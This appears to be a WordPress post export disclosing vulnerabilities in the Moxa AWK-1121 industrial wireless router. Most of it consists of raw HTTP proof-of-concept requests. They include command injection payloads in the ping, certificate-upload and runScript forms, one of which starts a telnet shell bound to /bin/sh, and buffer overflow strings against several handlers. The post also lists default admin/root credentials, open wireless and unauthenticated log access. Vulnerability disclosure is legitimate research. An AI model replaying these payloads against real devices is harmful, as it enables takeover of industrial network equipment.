{"id":245,"date":"2024-07-07T16:55:36","date_gmt":"2024-07-07T16:55:36","guid":{"rendered":"https:\/\/www.samuelhuntley.com\/?p=245"},"modified":"2024-07-07T16:55:36","modified_gmt":"2024-07-07T16:55:36","slug":"moxa_awk_1121-router-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.samuelhuntley.com\/?p=245","title":{"rendered":"Moxa_AWK_1121 Router Vulnerabilities"},"content":{"rendered":"<p>This page contains all the vulnerabilities identified in the Moxa router <strong>&#8220;Moxa_AWK_1121&#8221;<\/strong>. These vulnerabilities are also described <a href=\"https:\/\/github.com\/samuelhuntley\/Moxa_AWK_1121\">here<\/a>.<\/p>\n<pre>1. Command injection in the Ping command, allowed after login with admin\/root. Use the IE browser for this one. Also, this is a blind injection when it worked \r\n\r\n\tPOST \/forms\/webSetPingTrace HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/ping_trace.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tContent-Length: 86\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\r\n\tConnection: close\r\n\r\n\tsrvName=192.168.127.102;ping -c 8 192.168.127.101;##&amp;option=0&amp;bkpath=%2Fping_trace.asp\r\n\t\r\n\t\r\n\t# Displays the output now (192.168.127.101;echo `ls -1 \/usr\/webs`#)\r\n\t\r\n\t\tPOST \/forms\/webSetPingTrace HTTP\/1.1\r\n\t\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\t\tReferer: http:\/\/192.168.127.253\/ping_trace.asp\r\n\t\tAccept-Language: en-US\r\n\t\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\t\tContent-Type: application\/x-www-form-urlencoded\r\n\t\tContent-Length: 72\r\n\t\tHost: 192.168.127.253\r\n\t\tPragma: no-cache\r\n\t\tCookie: 
Password508=2204b322d9fe931fa9ef299987e9de47\r\n\t\tConnection: close\r\n\r\n\t\tsrvName=192.168.127.101;echo `ls -l`##&amp;option=0&amp;bkpath=%2Fping_trace.asp\r\n\t\tsrvName=192.168.127.101;telnetd -l\/bin\/sh -p9099##&amp;option=0&amp;bkpath=%2Fping_trace.asp\r\n\t\r\n\t\r\n2. Open wireless, so anyone can connect and give himself an ip address in range 192.168.127.xxx and use 192.168.127.253 as gateway NEW FIREMWARE\r\n\r\n3. No HTTPOnly flag on Cookie NEW FIREMWARE\r\n\r\n4. No SSL on HTTP which means anyone can see the traffic and having open wireless makes it even worse \r\n\r\n5. Default Telnet and SSH enabled with same creds admin\/root by default \r\n\r\n6. Config.ini can be downloaded clear text file \r\n\r\n7. CSRF systemic \r\n\r\n9. Possible Stack overflow in iw_system using 516 As and overflows at YYYY below  \r\n\r\n\tPOST \/forms\/webSetPingTrace HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/ping_trace.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tContent-Length: 622\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=6d86219d9cca208c1085cce81fdd31f0\r\n\tConnection: close\r\n\r\n\tsrvName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBLLLLZZZZXXXXYYYYKKKKCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEE&amp;option=0&amp;bkpath=%2Fping_trace.asp\r\n\t\r\n10. 
Possible memory corruption mostly can be stack overflow in sending mail or DOS as BBBC goes in r3 for this one in core2 or core3 and you are stopped executing web_extract_params from [r3,something] so needs right address there to overflow the stack, but right now DOS \r\n\r\n\r\n\tPOST \/forms\/web_SendTestEmail HTTP\/1.1\r\n\tAccept: *\/*\r\n\tContent-type: application\/x-www-form-urlencoded\r\n\tReferer: http:\/\/192.168.127.253\/email_server.asp\r\n\tAccept-Language: en-us\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: 192.168.127.253\r\n\tContent-Length: 752\r\n\tPragma: no-cache\r\n\tCookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\r\n\tConnection: close\r\n\r\n\tserver=server.mail.com&amp;username=test&amp;password=test&amp;from=test@mail.com&amp;to1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDDEEEEFFFFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n\t\r\n11. Command injection in iw_certvalidate in iwlib by using pasword for certfiel wrong  \r\n\r\n\tHowever CSRF_FI.html does not send cookies when sending the POST request with file contents.  and it sends only in FF and Chrome, Not in IE but still without cookies. 
\r\n\t\r\n\tBut an internal user can control the router after logging in to the router\r\n\t\r\n\tPOST \/forms\/web_certUpload HTTP\/1.1\r\n\tHost: 192.168.127.253\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\/20100101 Firefox\/59.0\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US,en;q=0.5\r\n\tCookie: Password508=68abf30ef8176a4248320929e04df562\r\n\tContent-Length: 899\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------114782935826962\r\n\tOrigin: null\r\n\tConnection: close\r\n\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"iw_privatePass\"\r\n\r\n\t;`ping -c 9 192.168.127.103` ##\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/wireless_cert.asp?index=1\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"certSection\"\r\n\r\n\tcertWlan\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"rfindex\"\r\n\r\n\t0\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"Submit\"\r\n\r\n\tSubmit\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"certFile1\"\r\n\r\n\ttest.txt\r\n\t-----------------------------114782935826962\r\n\tContent-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\r\n\tContent-Type: text\/xml\r\n\r\n\t&lt;a id=\"a\"&gt;&lt;b id=\"b\"&gt;hey!&lt;\/b&gt;&lt;\/a&gt;\r\n\t-----------------------------114782935826962--\r\n\r\n12. No authz on http:\/\/192.168.127.253\/\/systemlog.log \r\n\r\n13. 
Sprintf based BO in 0x00039518 web_runScript API call \r\n\r\n\tPOST \/forms\/web_runScript HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/Troubleshooting.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------7e21a62f2905ca\r\n\tContent-Length: 718\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=071b1093656adca3510d5e32f69737ec\r\n\tConnection: close\r\n\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\r\n\tContent-Type: application\/octet-stream\r\n\r\n\tls -ltr\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_storage\"\r\n\r\n\ttftp\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_serverip\"\r\n\r\n\t`ping -c 3 192.168.127.101`\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/Troubleshooting.asp\r\n\t-----------------------------7e21a62f2905ca--\r\n\r\n14. 
Memory corruption in web_runscript \r\n\r\n\tPOST \/forms\/web_runScript HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/Troubleshooting.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------7e21a62f2905ca\r\n\tContent-Length: 1013\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\r\n\tConnection: close\r\n\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\r\n\tContent-Type: application\/octet-stream\r\n\r\n\tls -ltr\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_storage\"\r\n\r\n\ttftp\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_serverip\"\r\n\r\n\tAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIAAAAAAAAAAAABBBBCCCCDDDDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIAAAAAAAAAAAABBBBCCCCDDDDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIAAAAAAAAAAAABBBBCCCCDDDD\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/Troubleshooting.asp\r\n\t-----------------------------7e21a62f2905ca--\r\n\t\r\n15. 
CMD INJ in web_runscript \r\n\r\n\tPOST \/forms\/web_runScript HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, image\/jxr, *\/*\r\n\tReferer: http:\/\/192.168.127.253\/Troubleshooting.asp\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\n\tContent-Type: multipart\/form-data; boundary=---------------------------7e21a62f2905ca\r\n\tContent-Length: 560\r\n\tHost: 192.168.127.253\r\n\tPragma: no-cache\r\n\tCookie: Password508=c598615e6217711824c76cb6f2360e49\r\n\tConnection: close\r\n\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_filename\"; filename=\"`ping -c 9 192.168.127.101`\"\r\n\tContent-Type: application\/octet-stream\r\n\r\n\tls -ltr\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_storage\"\r\n\r\n\ttftp\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"iw_serverip\"\r\n\r\n\t1111\r\n\t-----------------------------7e21a62f2905ca\r\n\tContent-Disposition: form-data; name=\"bkpath\"\r\n\r\n\t\/Troubleshooting.asp\r\n\t-----------------------------7e21a62f2905ca--\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This page contains all the vulnerabilities identified in Moxa Router &#8220;Moxa_AWK_1121&#8221;. Also these vulnerabilities are described here 1. Command injection in Ping command allowed after login with admin\/root. Use the IE browser for this one. 
Also this is a blind injection when worked POST \/forms\/webSetPingTrace HTTP\/1.1 Accept: text\/html, application\/xhtml+xml, image\/jxr, *\/* Referer: http:\/\/192.168.127.253\/ping_trace.asp Accept-Language: en-US &hellip; <a href=\"https:\/\/www.samuelhuntley.com\/?p=245\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">Moxa_AWK_1121 Router Vulnerabilities<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23],"tags":[],"_links":{"self":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts\/245"}],"collection":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=245"}],"version-history":[{"count":1,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts\/245\/revisions"}],"predecessor-version":[{"id":246,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=\/wp\/v2\/posts\/245\/revisions\/246"}],"wp:attachment":[{"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=245"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=245"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.samuelhuntley.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}